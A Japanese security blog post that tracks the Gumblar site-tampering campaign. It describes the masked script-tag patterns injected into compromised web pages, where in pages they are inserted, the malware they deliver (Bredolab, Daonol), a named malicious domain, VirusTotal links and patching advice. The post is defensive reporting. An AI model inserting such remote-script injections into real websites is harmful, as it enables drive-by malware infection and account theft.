|
主な原因が、ホームページを管理してる人のパソコンがウイルスに感染してアカウント情報(パスワード)が盗まれたことによる、いわゆる「ガンブラー」(Gumblar)のサイト改ざん攻撃の最近の動きです。  ◆ 8080 ページに挿入される不正なコードで強制的に導かれるURLアドレスは、昨日8月25日から単に「.com」のものが投入されてます。挿入される位置は基本的にページの最後尾あたりです。(手元で数が多いのが「nuttypiano. com」というドメイン名) <script type="text/javascript" src="http://●●●.com/▲▲▲.js"></script> <!--(32ケタの英数字の羅列)-->これを含め、8080タイプの改ざん被害サイトに挿入されてる不正なコードは全部で3パターンといった感じでしょうかね? <script type="text/javascript" src="http://■■■.●●●.◆◆◆:8080/▲▲▲.js"></script> <!--(32ケタの英数字の羅列)--> <script>(かなり長い意味不明な文字列 = 難読化されたコード) </script> <!--(32ケタの英数字の羅列)-->⇒ 仮に脆弱性攻撃が成立しウイルス(Bredolab)が強制発動すると、このウイルスを経由して攻撃者が用意した別のウイルスが次々と送り込まれパソコンが乗っ取られることになります。 たとえば、FTPソフトの設定を引っこ抜いてホームページのアカウント情報が盗まれる、インチキな偽セキュリティソフトが強制導入される、迷惑メールの配信マシンと化す、など。  VirusTotalの結果:
www.virustotal.com/file-scan/report.html?id=52b8d0bee9b7d3c81b38fb5dfb9779eadb0dd6c8084db769c9cbe9850b49dd06-1282826527 ※ 正直言って、かなーり頻繁にウイルスの差し替えを行なっとるようで当てにならん... ◆ Gumblar.x ページに挿入される不正なコードで強制的に導かれるURLアドレスは、すべてパスワードが盗まれ乗っ取られてる正規サイトです。挿入される位置は基本的にBODYタグの直前です。 </head> <script src=http://(改ざん被害を受けてる正規サイト)/▲▲▲.php ></script><body 〜⇒ 日本国内のIPアドレスだと、脆弱性攻撃コードが降ってこないようになってる(以前の記事)そうなので、ウイルス(Daonol/Kates)の強制発動は回避されます。ただ、このコードが挿入されてしまってる日本のサイトは複数ある上に、日本国内外のユーザーは当然ながら影響があります。 VirusTotalの結果:
www.virustotal.com/file-scan/report.html?id=6dd12c0614db884895f461e481eaf8fc3832bfa2b267d3f4c7c0f4a60e44629c-1282826746 ★ テキトーなまとめ
・影響がある環境: Windowsパソコン ・影響があるブラウザ: 主要なもの Internet Explorer、Firefox、Chrome、Opera (ブラウザの種類に合わせて攻撃コードが生成されるようになってるため) ・事前にできる対策: ソフトウェアの脆弱性を解消しておけばウイルスの強制発動は回避されます (詳しくはコチラ!) |
>
- コンピュータとインターネット
>
- インターネット
>
- その他インターネット
